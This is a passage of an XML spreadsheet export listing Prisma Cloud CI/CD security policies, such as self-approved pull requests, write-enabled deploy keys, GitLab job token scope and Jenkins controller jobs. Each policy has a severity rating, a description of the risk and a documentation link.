      <c r="R268" t="inlineStr"/>
      <c r="S268" t="inlineStr"/>
      <c r="T268" t="b">
        <v>0</v>
      </c>
      <c r="U268" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V268" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline Flow Control:</t>
        </is>
      </c>
      <c r="W268" t="inlineStr">
        <is>
          <t>User accounts with "write" permissions on an actively used repository can push code directly to the default branch without requiring pull request reviews before the code is merged, potentially allowing malicious code to flow through the pipeline to production systems. * An actively used repository is defined as having at least two contributors, over 50 commits, and has been updated in the last 90 days.</t>
        </is>
      </c>
      <c r="X268" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-pr-review-notrequired-merge</t>
        </is>
      </c>
      <c r="Y268" t="inlineStr"/>
      <c r="Z268" t="inlineStr">
        <is>
          <t>{"category":"Pipeline Flow Control","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA268" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB268" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC268" t="inlineStr"/>
      <c r="AD268" t="b">
        <v>1</v>
      </c>
      <c r="AE268" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF268" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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8" t="inlineStr">
        <is>
          <t>d108910f-8d5c-4b41-a9f7-723894897c17</t>
        </is>
      </c>
      <c r="AI268" t="inlineStr"/>
      <c r="AJ268" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK268" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" t="inlineStr"/>
      <c r="B269" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C269" s="2" t="inlineStr"/>
      <c r="D269" t="inlineStr"/>
      <c r="E269" t="inlineStr"/>
      <c r="F269" t="inlineStr"/>
      <c r="G269" t="b">
        <v>1</v>
      </c>
      <c r="H2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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J269" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline Flow Control:</t>
        </is>
      </c>
      <c r="K269" t="inlineStr">
        <is>
          <t>Requestors allowed to self-approve pull requests on default branch in Azure Repos</t>
        </is>
      </c>
      <c r="L269" t="inlineStr"/>
      <c r="M269" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N269" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O269" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P269" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q269" t="inlineStr"/>
      <c r="R269" t="inlineStr"/>
      <c r="S269" t="inlineStr"/>
      <c r="T269" t="b">
        <v>0</v>
      </c>
      <c r="U269" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V269" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline Flow Control:</t>
        </is>
      </c>
      <c r="W269" t="inlineStr">
        <is>
          <t>A requestor who opened a pull request can approve their own changes on an actively used repository*. Repository policy requires approval from reviewers to merge pull requests which can result in a requestor being able to approve their own request, if the required number of reviewers is set to 1. If the number of reviewers is set to more than 1, the requestor is considered as one of the reviewers, reducing the number of additional reviewers required to approve the pull request. Attackers compromising such a user account can potentially directly push code, which is likely to flow through the pipeline and be used in production systems. * An actively used repository has at least two contributors, over 50 commits, and was updated in the last 90 days.</t>
        </is>
      </c>
      <c r="X269" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-requestors-self-approve-pr-defaultbranch</t>
        </is>
      </c>
      <c r="Y269" t="inlineStr"/>
      <c r="Z269" t="inlineStr">
        <is>
          <t>{"category":"Pipeline Flow Control","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA269" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB269" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC269" t="inlineStr"/>
      <c r="AD269" t="b">
        <v>1</v>
      </c>
      <c r="AE269" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF269" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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 t="inlineStr">
        <is>
          <t>72e7d2e1-400b-48a2-ab90-87dad0bac1bc</t>
        </is>
      </c>
      <c r="AI269" t="inlineStr"/>
      <c r="AJ269" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK269" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" t="inlineStr"/>
      <c r="B270" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C270" s="2" t="inlineStr"/>
      <c r="D270" t="inlineStr"/>
      <c r="E270" t="inlineStr"/>
      <c r="F270" t="inlineStr"/>
      <c r="G270" t="b">
        <v>1</v>
      </c>
      <c r="H2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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J270" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="K270" t="inlineStr">
        <is>
          <t>GitHub deploy keys assigned with write permissions</t>
        </is>
      </c>
      <c r="L270" t="inlineStr"/>
      <c r="M270" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N270" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O270" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P270" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q270" t="inlineStr"/>
      <c r="R270" t="inlineStr"/>
      <c r="S270" t="inlineStr"/>
      <c r="T270" t="b">
        <v>0</v>
      </c>
      <c r="U270" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V270" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="W270" t="inlineStr">
        <is>
          <t>Deploy keys created on GitHub repositories are assigned with write permissions. An attacker that obtains access to a deploy key with write permissions has excessive abilities on the repository, such as editing its code, creating, editing and deleting releases, and uploading packages.</t>
        </is>
      </c>
      <c r="X270" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-deploy-keys-assigned-write-permissions</t>
        </is>
      </c>
      <c r="Y270" t="inlineStr"/>
      <c r="Z270" t="inlineStr">
        <is>
          <t>{"category":"Pipeline-Based Access Controls (PBAC)","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA270" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB270" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC270" t="inlineStr"/>
      <c r="AD270" t="b">
        <v>1</v>
      </c>
      <c r="AE270" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF270" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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0" t="inlineStr">
        <is>
          <t>17a39dd4-0348-4262-a403-0cbb9fe74b1d</t>
        </is>
      </c>
      <c r="AI270" t="inlineStr"/>
      <c r="AJ270" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK270" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" t="inlineStr"/>
      <c r="B271" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C271" s="2" t="inlineStr"/>
      <c r="D271" t="inlineStr"/>
      <c r="E271" t="inlineStr"/>
      <c r="F271" t="inlineStr"/>
      <c r="G271" t="b">
        <v>1</v>
      </c>
      <c r="H2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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J271" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="K271" t="inlineStr">
        <is>
          <t>GitLab project configured for group-wide access using job token</t>
        </is>
      </c>
      <c r="L271" t="inlineStr"/>
      <c r="M271" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N271" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O271" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P271" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q271" t="inlineStr"/>
      <c r="R271" t="inlineStr"/>
      <c r="S271" t="inlineStr"/>
      <c r="T271" t="b">
        <v>0</v>
      </c>
      <c r="U271" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V271" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="W271" t="inlineStr">
        <is>
          <t>GitLab pipeline jobs are assigned a token that enables authentication to specific API endpoints. https://docs.gitlab.com/ee/ci/jobs/ci_job_token.html The token has the same permissions to access the API as the user who triggered the job. By compromising a third party and achieving code execution in a pipeline, attackers can exploit the permissions granted by the token to expand their attack and potentially compromise any projects accessible by the user that are not specifically restricted by the job token allow list.</t>
        </is>
      </c>
      <c r="X271" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-project-config-group-access-job-token</t>
        </is>
      </c>
      <c r="Y271" t="inlineStr"/>
      <c r="Z271" t="inlineStr">
        <is>
          <t>{"category":"Pipeline-Based Access Controls (PBAC)","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA271" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB271" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC271" t="inlineStr"/>
      <c r="AD271" t="b">
        <v>1</v>
      </c>
      <c r="AE271" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF271" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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1" t="inlineStr">
        <is>
          <t>3ed57512-95c2-4723-b3c5-37cb27168907</t>
        </is>
      </c>
      <c r="AI271" t="inlineStr"/>
      <c r="AJ271" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK271" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" t="inlineStr"/>
      <c r="B272" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C272" s="2" t="inlineStr"/>
      <c r="D272" t="inlineStr"/>
      <c r="E272" t="inlineStr"/>
      <c r="F272" t="inlineStr"/>
      <c r="G272" t="b">
        <v>1</v>
      </c>
      <c r="H2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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J272" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="K272" t="inlineStr">
        <is>
          <t>Jobs are allowed to run on the Jenkins Controller</t>
        </is>
      </c>
      <c r="L272" t="inlineStr"/>
      <c r="M272" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N272" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O272" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P272" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q272" t="inlineStr"/>
      <c r="R272" t="inlineStr"/>
      <c r="S272" t="inlineStr"/>
      <c r="T272" t="b">
        <v>0</v>
      </c>
      <c r="U272" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V272" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="W272" t="inlineStr">
        <is>
          <t>The Jenkins instance allows jobs to run on the Jenkins Controller. The Jenkins Controller is the original node in the Jenkins installation. The Controller is responsible for administration operations on the Jenkins instance, such as job orchestration, node management, and authentication. Jenkins jobs can be run on the Jenkins Controller or on dedicated agents. Jobs are processes which can access the file system of the underlying execution environment, with the permissions of the operating system user account running the Jenkins process. Jobs that run on the Jenkins Controller can access the Controller`s file system. Attackers executing a malicious build that runs on the Controller can perform impactful malicious actions on the Jenkins instance, such as getting stored credentials, managing authorization configurations, and executing jobs. Information regarding isolating the Jenkins Controller can be found in the Jenkins documentation: https://www.jenkins.io/doc/book/security/controller-isolation/</t>
        </is>
      </c>
      <c r="X272" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/jenkins-cicd-pipeline-policies/jenkins-jobs-run-controller</t>
        </is>
      </c>
      <c r="Y272" t="inlineStr"/>
      <c r="Z272" t="inlineStr">
        <is>
          <t>{"category":"Pipeline-Based Access Controls (PBAC)","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA272" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB272" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC272" t="inlineStr"/>
      <c r="AD272" t="b">
        <v>1</v>
      </c>
      <c r="AE272" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF272" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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2" t="inlineStr">
        <is>
          <t>b648dc46-e31b-45f1-aa1e-aa5f685bcb3b</t>
        </is>
      </c>
      <c r="AI272" t="inlineStr"/>
      <c r="AJ272" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK272" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" t="inlineStr"/>
      <c r="B273" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C273" s="2" t="inlineStr"/>
      <c r="D273" t="inlineStr"/>
      <c r="E273" t="inlineStr"/>
      <c r="F273" t="inlineStr"/>
      <c r="G273" t="b">
        <v>1</v>
      </c>
      <c r="H2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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J273" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="K273" t="inlineStr">
        <is>
          <t>Default GitHub Actions workflow permissions in the repository set to `read and write`</t>
        </is>
      </c>
      <c r="L273" t="inlineStr"/>
      <c r="M273" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N273" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O273" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P273" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q273" t="inlineStr"/>
      <c r="R273" t="inlineStr"/>
      <c r="S273" t="inlineStr"/>
      <c r="T273" t="b">
        <v>0</v>
      </c>
      <c r="U273" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V273" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="W273" t="inlineStr">
        <is>
          <t>When a pipeline is executed, GitHub creates a short-lived token for interacting with the repository named GITHUB_TOKEN. If the pipeline`s default permissions are set to `read and write`, the GITHUB_TOKEN is assigned with `write` permissions. An attacker gaining access to a GitHub Actions pipeline with `write` permissions can push malicious code into the repository, which could potentially reach the production environment.</t>
        </is>
      </c>
      <c r="X273" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/ghactions-default-workflow-perm-repo-rw</t>
        </is>
      </c>
      <c r="Y273" t="inlineStr"/>
      <c r="Z273" t="inlineStr">
        <is>
          <t>{"category":"Pipeline-Based Access Controls (PBAC)","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA273" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB273" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC273" t="inlineStr"/>
      <c r="AD273" t="b">
        <v>1</v>
      </c>
      <c r="AE273" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF273" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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3" t="inlineStr">
        <is>
          <t>62cb0bd3-5c28-47c7-91e1-cb76ad3ba8ea</t>
        </is>
      </c>
      <c r="AI273" t="inlineStr"/>
      <c r="AJ273" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK273" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" t="inlineStr"/>
      <c r="B274" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C274" s="2" t="inlineStr"/>
      <c r="D274" t="inlineStr"/>
      <c r="E274" t="inlineStr"/>
      <c r="F274" t="inlineStr"/>
      <c r="G274" t="b">
        <v>1</v>
      </c>
      <c r="H2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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J274" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="K274" t="inlineStr">
        <is>
          <t>Default GitHub Actions workflow permissions in the organization set to `read and write`</t>
        </is>
      </c>
      <c r="L274" t="inlineStr"/>
      <c r="M274" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N274" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O274" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P274" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q274" t="inlineStr"/>
      <c r="R274" t="inlineStr"/>
      <c r="S274" t="inlineStr"/>
      <c r="T274" t="b">
        <v>0</v>
      </c>
      <c r="U274" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V274" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="W274" t="inlineStr">
        <is>
          <t>When a pipeline is executed, GitHub creates a short-lived token for interacting with the repository named GITHUB_TOKEN. If the pipeline`s default permissions are set to `read and write`, the GITHUB_TOKEN is assigned with `write` permissions. An attacker gaining access to a GitHub Actions pipeline with `write` permissions can push malicious code into the repository, which could potentially reach the production environment.</t>
        </is>
      </c>
      <c r="X274" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/ghactions-default-workflow-perm-org-rw</t>
        </is>
      </c>
      <c r="Y274" t="inlineStr"/>
      <c r="Z274" t="inlineStr">
        <is>
          <t>{"category":"Pipeline-Based Access Controls (PBAC)","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA274" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB274" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC274" t="inlineStr"/>
      <c r="AD274" t="b">
        <v>1</v>
      </c>
      <c r="AE274" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF274" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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4" t="inlineStr">
        <is>
          <t>91c5616d-aef6-47dc-9720-284734610a4d</t>
        </is>
      </c>
      <c r="AI274" t="inlineStr"/>
      <c r="AJ274" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK274" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" t="inlineStr"/>
      <c r="B275" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C275" s="2" t="inlineStr"/>
      <c r="D275" t="inlineStr"/>
      <c r="E275" t="inlineStr"/>
      <c r="F275" t="inlineStr"/>
      <c r="G275" t="b">
        <v>1</v>
      </c>
      <c r="H2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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J275" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="K275" t="inlineStr">
        <is>
          <t>GitLab deploy keys assigned with write permissions</t>
        </is>
      </c>
      <c r="L275" t="inlineStr"/>
      <c r="M275" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N275" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O275" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P275" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q275" t="inlineStr"/>
      <c r="R275" t="inlineStr"/>
      <c r="S275" t="inlineStr"/>
      <c r="T275" t="b">
        <v>0</v>
      </c>
      <c r="U275" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V275" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="W275" t="inlineStr">
        <is>
          <t>Deploy keys created on GitLab projects are assigned with write permissions. An attacker that obtains access to a deploy key with write permissions has excessive abilities on the project, such as editing the code of its repository.</t>
        </is>
      </c>
      <c r="X275" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-deploy-keys-assigned-write-permissions</t>
        </is>
      </c>
      <c r="Y275" t="inlineStr"/>
      <c r="Z275" t="inlineStr">
        <is>
          <t>{"category":"Pipeline-Based Access Controls (PBAC)","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA275" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB275" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC275" t="inlineStr"/>
      <c r="AD275" t="b">
        <v>1</v>
      </c>
      <c r="AE275" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF275" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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5" t="inlineStr">
        <is>
          <t>abc95060-72ee-4a73-b191-a12a79abe185</t>
        </is>
      </c>
      <c r="AI275" t="inlineStr"/>
      <c r="AJ275" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK275" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" t="inlineStr"/>
      <c r="B276" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C276" s="2" t="inlineStr"/>
      <c r="D276" t="inlineStr"/>
      <c r="E276" t="inlineStr"/>
      <c r="F276" t="inlineStr"/>
      <c r="G276" t="b">
        <v>1</v>
      </c>
      <c r="H2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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J276" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="K276" t="inlineStr">
        <is>
          <t>All Jenkins instance jobs run with high privileges</t>
        </is>
      </c>
      <c r="L276" t="inlineStr"/>
      <c r="M276" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N276" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O276" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P276" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q276" t="inlineStr"/>
      <c r="R276" t="inlineStr"/>
      <c r="S276" t="inlineStr"/>
      <c r="T276" t="b">
        <v>0</v>
      </c>
      <c r="U276" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V276" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="W276" t="inlineStr">
        <is>
          <t>Each executed Jenkins job is assigned with the privileges of a Jenkins user. These privileges are used to interact with the Jenkins system, and include creating jobs, running builds, and executing on the various configured Jenkins nodes. All jobs in the instance are configured to run with the Jenkins SYSTEM user account (that should not be confused with the operating system user). This user has high privileges over the system, and is allowed to perform any action on the Jenkins instance. An attacker executing malicious code in any job can take advantage of these privileges and perform impactful actions on the Jenkins instance and its nodes. For more information about access controls for builds: https://www.jenkins.io/doc/book/security/build-authorization/</t>
        </is>
      </c>
      <c r="X276" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/jenkins-cicd-pipeline-policies/jenkins-job-run-high-privileges</t>
        </is>
      </c>
      <c r="Y276" t="inlineStr"/>
      <c r="Z276" t="inlineStr">
        <is>
          <t>{"category":"Pipeline-Based Access Controls (PBAC)","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA276" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB276" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC276" t="inlineStr"/>
      <c r="AD276" t="b">
        <v>1</v>
      </c>
      <c r="AE276" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF276" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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6" t="inlineStr">
        <is>
          <t>4aca75bc-a2a6-470f-80a3-39b5df547bce</t>
        </is>
      </c>
      <c r="AI276" t="inlineStr"/>
      <c r="AJ276" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK276" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" t="inlineStr"/>
      <c r="B277" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C277" s="2" t="inlineStr"/>
      <c r="D277" t="inlineStr"/>
      <c r="E277" t="inlineStr"/>
      <c r="F277" t="inlineStr"/>
      <c r="G277" t="b">
        <v>1</v>
      </c>
      <c r="H2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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J277" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="K277" t="inlineStr">
        <is>
          <t>GitLab project job token authorized to access other GitLab projects</t>
        </is>
      </c>
      <c r="L277" t="inlineStr"/>
      <c r="M277" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N277" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O277" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P277" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q277" t="inlineStr"/>
      <c r="R277" t="inlineStr"/>
      <c r="S277" t="inlineStr"/>
      <c r="T277" t="b">
        <v>0</v>
      </c>
      <c r="U277" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V277" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="W277" t="inlineStr">
        <is>
          <t>GitLab pipeline jobs are assigned with a token that enables authenticating to specific GitLab API endpoints. https://docs.gitlab.com/ee/ci/jobs/ci_job_token.html The token is assigned with the same permissions as the user who triggered the pipeline job. The token scope can be limited to the current project only, or to be authorized with access to any private project as the triggering user account. An unlimited token can allow attackers compromising the pipeline job to misuse the permissions granted by the token scope to expand their attack surface by executing further attacks against additional projects.</t>
        </is>
      </c>
      <c r="X277" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-project-token-access-other-projects</t>
        </is>
      </c>
      <c r="Y277" t="inlineStr"/>
      <c r="Z277" t="inlineStr">
        <is>
          <t>{"category":"Pipeline-Based Access Controls (PBAC)","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA277" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB277" t="inlineStr">
        <is>
